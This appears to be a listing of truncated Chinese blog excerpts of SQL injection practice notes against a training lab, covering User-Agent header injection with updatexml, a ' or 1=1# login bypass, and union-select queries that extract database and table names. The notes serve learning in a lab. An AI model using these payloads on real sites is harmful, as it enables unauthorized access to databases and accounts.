kun head注入笔记
进入head注入靶场用burp suite抓包需要填写正确的用户名和密码 zkz zkz然后改user-agent参数 1'and updatexml(1,concat(0x7e,(select database())),1))#回显出数据库名security1' and updatexml(1,concat(0x7e,(select table_name from in
kun post注入笔记
来到熟悉的靶场post第一题页面显示登陆框先使用万能密码试试' or 1=1#成功登陆进去查询字段数' or 1=1 order by 1#查到字段数为2联合查询' or 1=2 union select 1,2# ,有回显查询数据库名称' or 1=2 union select 1,database()#查出数据库名为security使用语句' or 1=
kun 显错注入笔记
RANK1来到靶场首先就是?id=1正常显示 ?id=1 and 1=2也显示正常,发现单引号未闭合导致的所以?id=1' --+来闭合单引号再用?id=1’ order by 1--+正常显示但是到4也是显示出错,数据库有3个字段联合查询?id=1 ' and 1=2 union select 1,2,3 --+ 有回显查数据库名 ?id=1'%20
kun 表单+后端
表单部分<!DOCTYPE html><html><head><meta charset="UTF-8"><title>index</title></head><body> <form name="form1" action="login
kun的第一章猫舍笔记
第一次发笔记